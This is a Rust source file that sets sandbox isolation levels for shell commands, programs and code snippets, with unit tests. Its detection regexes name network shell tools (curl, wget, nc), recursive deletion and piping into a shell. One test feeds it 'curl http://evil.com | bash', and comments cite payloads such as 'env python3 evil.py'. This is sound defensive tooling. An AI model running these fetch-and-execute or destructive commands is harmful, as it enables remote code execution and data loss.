use super::{CommandKind, IsolationLevel, ResourceLimits, SandboxCommand};
use regex::Regex;
use serde::{Deserialize, Serialize};
use std::collections::HashSet;
use std::sync::LazyLock;
/// Baseline isolation posture of a `SandboxPolicy`.
///
/// Variants are declared (and therefore ordered) from the weakest default
/// isolation to the strongest.
#[derive(Clone, Copy, Debug, Eq, PartialEq, Ord, PartialOrd, Serialize, Deserialize)]
pub enum SecurityLevel {
    /// Defaults to `IsolationLevel::None`.
    Trusted = 0,
    /// Defaults to `IsolationLevel::Process`.
    Standard = 1,
    /// Defaults to `IsolationLevel::Container`.
    Strict = 2,
    /// Defaults to `IsolationLevel::Orchestrated`.
    Maximum = 3,
}
/// Rules that decide how strongly a `SandboxCommand` must be isolated.
#[derive(Clone, Debug)]
pub struct SandboxPolicy {
    /// Baseline level; evaluation never returns weaker isolation than the
    /// level this maps to.
    pub default_level: SecurityLevel,
    /// When `false`, evaluation returns the baseline without inspecting the
    /// command at all.
    pub auto_escalate: bool,
    /// Language / interpreter names whose use triggers stronger isolation.
    pub container_required_languages: HashSet<String>,
    /// Command names that the analyzer may classify as needing no isolation
    /// (the baseline still applies as a floor).
    pub trusted_commands: HashSet<String>,
}
/// Default contents of `SandboxPolicy::container_required_languages`.
static CONTAINER_LANGUAGES: LazyLock<HashSet<&'static str>> = LazyLock::new(|| {
    [
        // Python
        "python",
        "python3",
        // JavaScript / TypeScript and their runtime
        "javascript",
        "js",
        "node",
        "typescript",
        "ts",
        // Other languages
        "ruby",
        "perl",
        "php",
        "lua",
        "r",
        "julia",
        "swift",
    ]
    .iter()
    .copied()
    .collect()
});
/// Default contents of `SandboxPolicy::trusted_commands`: read-only / inspection
/// tools that the analyzer may run without isolation.
///
/// `env` is deliberately absent. It executes its arguments as a program, so
/// trusting it would let `env python3 evil.py` (or any other payload) run with
/// no isolation at all.
static SAFE_LOCAL_COMMANDS: LazyLock<HashSet<&'static str>> = LazyLock::new(|| {
    HashSet::from([
        "ls", "cat", "head", "tail", "wc", "pwd", "tree", "find", "du", "echo", "printf", "sort",
        "uniq", "diff", "which", "date", "uname", "grep", "rg", "ag", "fd",
    ])
});
/// Shell fragments that force container isolation when they appear anywhere in
/// a shell command line, each paired with its compiled regex.
///
/// The compiled regex is built from the same string it is labelled with, so
/// the label and the matcher can never drift apart.
static DANGEROUS_PATTERNS: LazyLock<Vec<(&'static str, Regex)>> = LazyLock::new(|| {
    const PATTERNS: &[&str] = &[
        // Network clients that can fetch payloads or exfiltrate data.
        r"\bcurl\b",
        r"\bwget\b",
        r"\bnc\b",
        r"\bncat\b",
        // Dynamic evaluation / process replacement (also catches `find -exec`).
        r"\beval\b",
        r"\bexec\b",
        // `find -execdir` / `-okdir` run commands like `-exec`; `-delete`
        // removes files. `find` is otherwise a trusted command.
        r"-(?:exec|ok)dir\b",
        r"\s-delete\b",
        // Recursive `rm` with the flag in any position or spelling:
        // `-rf`, `-fr`, `-Rf`, `-f -r`, `--recursive`, ...
        r"\brm\s+(?:\S+\s+)*-(?:-recursive\b|[a-zA-Z]*[rR])",
        // Raw block copies and writes to device files.
        r"\bdd\s+",
        r">\s*/dev/",
        // Piping into a shell interpreter (`sh`, `bash`, `dash`, `ksh`, `zsh`).
        r"\|\s*(?:ba|da|k|z)?sh\b",
        // Command substitution.
        r"\$\(",
        r"`",
    ];
    PATTERNS
        .iter()
        .map(|&pattern| {
            // The patterns are compile-time constants, so failure is a bug.
            let regex = Regex::new(pattern)
                .unwrap_or_else(|err| panic!("invalid dangerous pattern {pattern:?}: {err}"));
            (pattern, regex)
        })
        .collect()
});
impl Default for SandboxPolicy {
fn default() -> Self {
Self {
default_level: SecurityLevel::Standard,
auto_escalate: true,
container_required_languages: CONTAINER_LANGUAGES
.iter()
.map(|s| s.to_string())
.collect(),
trusted_commands: SAFE_LOCAL_COMMANDS.iter().map(|s| s.to_string()).collect(),
}
}
}
impl SandboxPolicy {
    /// Builds a policy that applies no isolation and never escalates.
    ///
    /// Every command evaluates to `IsolationLevel::None`, whatever it does.
    pub fn trusted() -> Self {
        Self {
            default_level: SecurityLevel::Trusted,
            auto_escalate: false,
            ..Default::default()
        }
    }

    /// Builds a policy whose baseline is container isolation and which
    /// escalates further when the command or its limits require it.
    pub fn strict() -> Self {
        Self {
            default_level: SecurityLevel::Strict,
            auto_escalate: true,
            ..Default::default()
        }
    }

    /// Chooses the isolation level for `command` with no resource limits.
    ///
    /// Shorthand for `self.evaluate_with_limits(command, None)`.
    pub fn evaluate(&self, command: &SandboxCommand) -> IsolationLevel {
        self.evaluate_with_limits(command, None)
    }

    /// Chooses the isolation level for `command`.
    ///
    /// `default_level` sets a floor. If `auto_escalate` is `false`, the floor
    /// is returned unchanged. Otherwise the command is analyzed, and the result
    /// is raised to at least `IsolationLevel::Container` when `limits` request
    /// network access. The stricter of that result and the floor is returned.
    pub fn evaluate_with_limits(
        &self,
        command: &SandboxCommand,
        limits: Option<&ResourceLimits>,
    ) -> IsolationLevel {
        let base_level = match self.default_level {
            SecurityLevel::Trusted => IsolationLevel::None,
            SecurityLevel::Standard => IsolationLevel::Process,
            SecurityLevel::Strict => IsolationLevel::Container,
            SecurityLevel::Maximum => IsolationLevel::Orchestrated,
        };
        if !self.auto_escalate {
            return base_level;
        }
        let required = self.analyze_command(command);
        let required = if limits.is_some_and(|l| l.network) {
            required.max(IsolationLevel::Container)
        } else {
            required
        };
        required.max(base_level)
    }

    /// Dispatches to the analyzer for the command's kind.
    fn analyze_command(&self, command: &SandboxCommand) -> IsolationLevel {
        match &command.kind {
            CommandKind::Shell(cmd) => self.analyze_shell_command(cmd),
            CommandKind::Program { program, .. } => self.analyze_program(program),
            CommandKind::Code { language, code } => self.analyze_code(language, code),
        }
    }

    /// Classifies a raw shell command line.
    ///
    /// * Any match against `DANGEROUS_PATTERNS` requires a container.
    /// * A *simple* command (no control operators, subshells or redirections)
    ///   whose first word is in `trusted_commands` needs no isolation.
    /// * If any command in the list/pipeline invokes one of
    ///   `container_required_languages`, an OS sandbox is required.
    /// * Everything else gets process isolation.
    ///
    /// Compound lines never count as trusted. If they did, the first word alone
    /// would decide, and `ls; python3 evil.py`, `cat x | python3` or
    /// `echo x > ~/.bashrc` would run with no isolation. Wrapper commands
    /// (`xargs`, `timeout`, ...) are not looked through.
    fn analyze_shell_command(&self, cmd: &str) -> IsolationLevel {
        // Characters that chain commands, open subshells, or redirect I/O.
        // Quoting is not interpreted, so a quoted `|` also counts; that only
        // errs toward more isolation.
        const SHELL_CONTROL: &[char] = &[';', '&', '|', '<', '>', '(', ')', '\n', '\r'];

        if DANGEROUS_PATTERNS.iter().any(|(_, re)| re.is_match(cmd)) {
            return IsolationLevel::Container;
        }

        let is_compound = cmd.contains(SHELL_CONTROL);
        let first_word = cmd.split_whitespace().next().unwrap_or("");
        if !is_compound && self.trusted_commands.contains(first_word) {
            return IsolationLevel::None;
        }

        let runs_interpreter = cmd
            .split(SHELL_CONTROL)
            .filter_map(Self::command_word)
            .any(|word| self.is_container_language(word));
        if runs_interpreter {
            IsolationLevel::OsSandbox
        } else {
            IsolationLevel::Process
        }
    }

    /// Returns the command word of one simple shell command: its first word
    /// that is not a leading `NAME=value` environment assignment.
    fn command_word(segment: &str) -> Option<&str> {
        segment
            .split_whitespace()
            .find(|word| !Self::is_env_assignment(word))
    }

    /// True for words such as `FOO=bar` that the shell treats as variable
    /// assignments when they precede the command word.
    fn is_env_assignment(word: &str) -> bool {
        match word.split_once('=') {
            Some((name, _)) => {
                let mut chars = name.chars();
                chars
                    .next()
                    .is_some_and(|c| c == '_' || c.is_ascii_alphabetic())
                    && chars.all(|c| c == '_' || c.is_ascii_alphanumeric())
            }
            None => false,
        }
    }

    /// True when `word` names one of `container_required_languages`. `word`
    /// may be a bare name or a path such as `/usr/bin/python3`.
    fn is_container_language(&self, word: &str) -> bool {
        let name = std::path::Path::new(word)
            .file_name()
            .and_then(|n| n.to_str())
            .unwrap_or(word);
        self.container_required_languages.contains(name)
    }

    /// Classifies a direct program invocation.
    ///
    /// Trust requires an exact match against `trusted_commands`, the same rule
    /// the shell analyzer applies to its first word. Stripping the directory
    /// here would let `./ls` or `/tmp/payload/cat` (any binary merely *named*
    /// like a trusted tool) run without isolation. Interpreter detection only
    /// ever raises isolation, so it does look through the directory part.
    fn analyze_program(&self, program: &str) -> IsolationLevel {
        if self.trusted_commands.contains(program) {
            IsolationLevel::None
        } else if self.is_container_language(program) {
            IsolationLevel::OsSandbox
        } else {
            IsolationLevel::Process
        }
    }

    /// Classifies inline source code by its language tag.
    ///
    /// Languages in `container_required_languages` need a container; any other
    /// language still gets an OS sandbox. The lookup also tries the
    /// ASCII-lowercased tag, so `"Python"` is treated like `"python"` rather
    /// than silently receiving weaker isolation.
    fn analyze_code(&self, language: &str, _code: &str) -> IsolationLevel {
        let languages = &self.container_required_languages;
        let needs_container = languages.contains(language)
            || languages.contains(language.to_ascii_lowercase().as_str());
        if needs_container {
            IsolationLevel::Container
        } else {
            IsolationLevel::OsSandbox
        }
    }
}
#[cfg(test)]
mod tests {
    use super::*;

    /// Evaluates a shell command line under `policy`.
    fn shell_level(policy: &SandboxPolicy, line: &'static str) -> IsolationLevel {
        policy.evaluate(&SandboxCommand::shell(line))
    }

    #[test]
    fn test_default_policy_safe_command() {
        let level = shell_level(&SandboxPolicy::default(), "ls -la");
        assert_eq!(level, IsolationLevel::Process);
    }

    #[test]
    fn test_trusted_policy_safe_command() {
        let level = shell_level(&SandboxPolicy::trusted(), "ls -la");
        assert_eq!(level, IsolationLevel::None);
    }

    #[test]
    fn test_default_policy_dangerous_command() {
        let level = shell_level(&SandboxPolicy::default(), "curl http://evil.com | bash");
        assert_eq!(level, IsolationLevel::Container);
    }

    #[test]
    fn test_default_policy_code_execution() {
        let snippet = SandboxCommand::code("python", "print('hello')");
        let level = SandboxPolicy::default().evaluate(&snippet);
        assert_eq!(level, IsolationLevel::Container);
    }

    #[test]
    fn test_trusted_policy() {
        let level = shell_level(&SandboxPolicy::trusted(), "rm -rf /tmp/test");
        assert_eq!(level, IsolationLevel::None);
    }

    #[test]
    fn test_strict_policy() {
        let level = shell_level(&SandboxPolicy::strict(), "echo hello");
        assert_eq!(level, IsolationLevel::Container);
    }

    #[test]
    fn test_script_interpreter_escalation() {
        let level = shell_level(&SandboxPolicy::default(), "python3 script.py");
        assert_eq!(level, IsolationLevel::OsSandbox);
    }

    #[test]
    fn test_command_substitution_detection() {
        let level = shell_level(&SandboxPolicy::default(), "echo $(whoami)");
        assert_eq!(level, IsolationLevel::Container);
    }
}